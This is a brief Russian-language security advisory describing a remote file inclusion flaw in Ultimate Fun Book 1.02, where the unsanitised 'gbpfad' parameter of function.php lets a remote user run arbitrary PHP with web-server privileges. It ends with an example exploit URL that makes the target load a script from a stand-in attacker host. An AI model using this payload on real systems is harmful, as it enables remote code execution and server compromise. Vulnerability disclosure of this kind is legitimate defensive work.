Рекомендуем почитать:


Хакер #311. Сетевые протоколы под микроскопом
Программа: Ultimate Fun Book 1.02
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «gbpfad» сценарием function.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://target/path/function.php?gbpfad=http://evil[script]